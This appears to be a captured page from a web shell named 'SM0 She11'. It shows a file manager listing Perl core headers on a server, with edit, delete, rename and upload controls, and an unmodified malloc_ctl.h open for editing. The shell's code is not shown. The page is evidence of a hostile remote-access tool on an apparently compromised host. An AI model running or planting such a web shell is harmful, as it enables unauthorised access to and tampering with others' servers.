SM0 She11
Path:
/
/
usr
/
lib64
/
perl5
/
CORE
Full Path (server): /usr/lib64/perl5/CORE
Create Fil3
Upl04d Fil3
📄 EXTERN.h
[E]
[D]
[R]
📄 INTERN.h
[E]
[D]
[R]
📄 XSUB.h
[E]
[D]
[R]
📄 av.h
[E]
[D]
[R]
📄 bitcount.h
[E]
[D]
[R]
📄 charclass_invlists.h
[E]
[D]
[R]
📄 config.h
[E]
[D]
[R]
📄 cop.h
[E]
[D]
[R]
📄 cv.h
[E]
[D]
[R]
📄 dosish.h
[E]
[D]
[R]
📄 embed.h
[E]
[D]
[R]
📄 embedvar.h
[E]
[D]
[R]
📄 fakesdio.h
[E]
[D]
[R]
📄 fakethr.h
[E]
[D]
[R]
📄 feature.h
[E]
[D]
[R]
📄 form.h
[E]
[D]
[R]
📄 git_version.h
[E]
[D]
[R]
📄 gv.h
[E]
[D]
[R]
📄 handy.h
[E]
[D]
[R]
📄 hv.h
[E]
[D]
[R]
📄 intrpvar.h
[E]
[D]
[R]
📄 iperlsys.h
[E]
[D]
[R]
📄 keywords.h
[E]
[D]
[R]
📄 l1_char_class_tab.h
[E]
[D]
[R]
📄 libperl.so
[E]
[D]
[R]
📄 malloc_ctl.h
[E]
[D]
[R]
📄 metaconfig.h
[E]
[D]
[R]
📄 mg.h
[E]
[D]
[R]
📄 mg_data.h
[E]
[D]
[R]
📄 mg_raw.h
[E]
[D]
[R]
📄 mg_vtable.h
[E]
[D]
[R]
📄 mydtrace.h
[E]
[D]
[R]
📄 nostdio.h
[E]
[D]
[R]
📄 op.h
[E]
[D]
[R]
📄 op_reg_common.h
[E]
[D]
[R]
📄 opcode.h
[E]
[D]
[R]
📄 opnames.h
[E]
[D]
[R]
📄 overload.h
[E]
[D]
[R]
📄 pad.h
[E]
[D]
[R]
📄 parser.h
[E]
[D]
[R]
📄 patchlevel.h
[E]
[D]
[R]
📄 perl.h
[E]
[D]
[R]
📄 perlapi.h
[E]
[D]
[R]
📄 perldtrace.h
[E]
[D]
[R]
📄 perlio.h
[E]
[D]
[R]
📄 perliol.h
[E]
[D]
[R]
📄 perlsdio.h
[E]
[D]
[R]
📄 perlsfio.h
[E]
[D]
[R]
📄 perlvars.h
[E]
[D]
[R]
📄 perly.h
[E]
[D]
[R]
📄 pp.h
[E]
[D]
[R]
📄 pp_proto.h
[E]
[D]
[R]
📄 proto.h
[E]
[D]
[R]
📄 reentr.h
[E]
[D]
[R]
📄 regcharclass.h
[E]
[D]
[R]
📄 regcomp.h
[E]
[D]
[R]
📄 regexp.h
[E]
[D]
[R]
📄 regnodes.h
[E]
[D]
[R]
📄 scope.h
[E]
[D]
[R]
📄 sv.h
[E]
[D]
[R]
📄 thread.h
[E]
[D]
[R]
📄 time64.h
[E]
[D]
[R]
📄 time64_config.h
[E]
[D]
[R]
📄 uconfig.h
[E]
[D]
[R]
📄 unixish.h
[E]
[D]
[R]
📄 utf8.h
[E]
[D]
[R]
📄 utfebcdic.h
[E]
[D]
[R]
📄 util.h
[E]
[D]
[R]
📄 uudmap.h
[E]
[D]
[R]
📄 warnings.h
[E]
[D]
[R]
Editing: malloc_ctl.h
#ifndef MALLOC_CTL_H # define MALLOC_CTL_H struct perl_mstats { UV *nfree; UV *ntotal; IV topbucket, topbucket_ev, topbucket_odd, totfree, total, total_chain; IV total_sbrk, sbrks, sbrk_good, sbrk_slack, start_slack, sbrked_remains; IV minbucket; /* Level 1 info */ UV *bucket_mem_size; UV *bucket_available_size; UV nbuckets; }; typedef struct perl_mstats perl_mstats_t; PERL_CALLCONV Malloc_t Perl_malloc (MEM_SIZE nbytes); PERL_CALLCONV Malloc_t Perl_calloc (MEM_SIZE elements, MEM_SIZE size); PERL_CALLCONV Malloc_t Perl_realloc (Malloc_t where, MEM_SIZE nbytes); /* 'mfree' rather than 'free', since there is already a 'perl_free' * that causes clashes with case-insensitive linkers */ PERL_CALLCONV Free_t Perl_mfree (Malloc_t where); #ifndef NO_MALLOC_DYNAMIC_CFG /* IV configuration data */ enum { MallocCfg_FIRST_SBRK, MallocCfg_MIN_SBRK, MallocCfg_MIN_SBRK_FRAC1000, MallocCfg_SBRK_ALLOW_FAILURES, MallocCfg_SBRK_FAILURE_PRICE, MallocCfg_sbrk_goodness, MallocCfg_filldead, MallocCfg_fillalive, MallocCfg_fillcheck, MallocCfg_skip_cfg_env, MallocCfg_cfg_env_read, MallocCfg_emergency_buffer_size, MallocCfg_emergency_buffer_last_req, MallocCfg_emergency_buffer_prepared_size, MallocCfg_last }; /* char* configuration data */ enum { MallocCfgP_emergency_buffer, MallocCfgP_emergency_buffer_prepared, MallocCfgP_last }; START_EXTERN_C extern IV *MallocCfg_ptr; extern char **MallocCfgP_ptr; END_EXTERN_C #endif #endif
Save